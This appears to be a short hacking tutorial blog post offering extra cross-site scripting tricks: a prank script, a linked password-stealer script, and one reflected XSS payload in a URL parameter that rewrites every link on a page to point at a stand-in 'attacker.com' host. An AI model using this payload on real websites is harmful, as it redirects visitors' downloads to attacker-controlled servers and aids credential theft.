How To: XSS Bonuses

XSS Bonuses

This is a followup from my recent series on XSS exploitation, giving a few extra attacks/tricks to try.

Google's Prank

Google developed a JavaScript code (available here) that you can customize. Basically, it makes all the elements on the page swirl around, fade out to white, and pretends to hack you. Customize it to your own liking.

Password Stealer

Martani Fyssal, a Microsoft developer, created a JavaScript code that steals passwords. You can download it here.

Changing Download

Using this code, you can change the download reference for a website.

index.php?name=<script>window.onload = function() {var link=document.getElementsByTagName("a");link0. href="http://attacker.com";}</script>

Just make sure you change the respective variables.
Credits to Ramesh Natarajan.

Persistent Connections

Again by Ramesh, these are two PHP scripts that create a persistent connection.

login.php

home.php

Change what you want.

Thanks

I'd like to thank the many people who help me study, from the members of C3, to the many pentesters online to take their time to share their knowledge. You guys help keep me going. Many thanks to Ramesh Natarajan for his amazing scripts and his wonderful sharing. And of course, thank you all for keeping this community alive.

C|H of C3

Want to start making money as a white hat hacker? Jump-start your white-hat hacking career with our 2020 Premium Ethical Hacking Certification Training Bundle from the new Null Byte Shop and get over 60 hours of training from ethical hacking professionals.

Buy Now (90% off) >

Our Best Hacking & Security Guides

New Null Byte posts — delivered straight to your inbox.

1 Comment

Excellent tutorial and resources!! Looking forward to more!

Share Your Thoughts

  • Hot
  • Latest